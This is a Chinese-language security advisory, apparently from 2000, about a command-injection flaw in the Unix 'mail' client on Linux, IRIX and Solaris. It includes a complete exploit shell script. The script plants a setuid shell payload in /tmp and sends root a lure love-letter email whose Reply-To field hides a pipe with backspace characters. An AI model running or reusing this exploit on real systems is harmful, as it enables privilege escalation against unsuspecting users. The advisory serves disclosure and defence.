发布日期：2000-11-07
更新日期：2000-11-07

受影响系统：

   Caldera OpenLinux 2.4
   Debian Linux 2.3
   Debian Linux 2.2
   RedHat Linux 7.0
   RedHat Linux 6.2E sparc
   RedHat Linux 6.2E i386
   RedHat Linux 6.2E alpha
   RedHat Linux 6.2 sparc
   RedHat Linux 6.2 i386
   RedHat Linux 6.2 alpha
   SGI IRIX 6.3
   SGI IRIX 5.3
   SGI IRIX 5.2
   Sun Solaris 2.6_x86HW3/98
   Sun Solaris 2.6_x86
   Sun Solaris 2.6
   Sun Solaris 2.5.1_x86
   Sun Solaris 2.5.1_ppc
   Sun Solaris 2.5.1
   Sun Solaris 2.5_x86
   Sun Solaris 2.5
   Sun Solaris 2.4_x86

描述：

---

mail 是一个简单的主控台 e-mail 客户。在几个制造商发行的
这个程序中存在一个漏洞。

攻击者可以构建一个邮件，在它的 "Reply-To" 域中填入仔细
构造的字符串，其中包含 shell 命令字符，再把它发送给接收
者/被攻击者。

接收到这个邮件时，接收者象平常一样看待 "Reply-To" 域中
有危险的文本，不作回应删除这个邮件。

然而，可以用一种方式来构造 "Reply-To" 域，使得这些额外
的字符被去掉。通过包含一系列的 '^H' 字符，攻击者能影响
"Reply-To" 域中的文本在接收者屏幕上的显示。结果是，接收
者对邮件中的变量（比如 "from" 和 "reply-to"）已发生畸形
看不到任何迹象。

如果这个邮件引起接收者回应，"Reply-To" 域中的内容将被
解释成对 /tmp 目录中事先存在的文件的访问。这个文件是
攻击者事先存放的，可以包含任意的 shell 命令。这将使攻
击把自己的权限提升到邮件接收者（被攻击者）所拥有的权限。
有可能是提升为 root 权限，如果 root 回应这个有害邮件的
话。


<* 来源：gregory duchemin (c3rb3r@hotmail.com) *>



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

  #!/bin/sh
  #
  # I-Love-U.sh

  # Exploit for | char in mail Reply-To field
  # tested on linux Caldera (techno preview linux 2.4.0)
  #

  # Gregory Duchemin ( AKA C3rb3r )
  # Security Consultant
  #
  # NEUROCOM CANADA
  # 1001 bd Maisonneuve Ouest
  # Montreal (Quebec) H3A 3C8 Canada
  # c3rb3r@hotmail.com

  # Cook Ingredients: one | char (hidden in an uppercase i),
  # a bit of evil ^H to hide "/tmp/", and a girl to stimulate a reply ;)
  #

  cd /tmp
  cat ^H^H^H^H^Hsabelle@hotmail.com << _End
  #!/bin/sh
  cp /bin/sh /tmp/newsh
  chmod a+rws /tmp/newsh
  _End

  {
    sleep 1
    echo "HELO hotmail.com"
    sleep 1
    echo "MAIL FROM:<Isabelle@hotmail.com>"
    sleep 1
    echo "RCPT TO:<root>"
    sleep 1
    echo "DATA"
    sleep 1

  # Reply-to will appear as Reply-To:<|sabelle@hotmail.com>

    echo "Reply-To:<|/tmp/^H^H^H^H^Hsabelle@hotmail.com>"
    sleep 1
    echo
    echo "I saw you yesterday, since i'm a bit confused..i just wanted"
    echo "to say you."
    echo "I believe I LOVE YOU"
    echo
    echo "Isabelle."
    echo "."
    sleep 1
    echo "QUIT"
    sleep 2
  }|telnet localhost 25

  echo "Job is done...now check for newsh in /tmp"
  echo
  echo




建议：

---

临时解决办法：

  NSFOCUS建议您采用某种方法对"reply-to"域中的文本进行过滤。

厂商补丁：

  暂无



浏览次数：7071
严重程度：0（网友投票）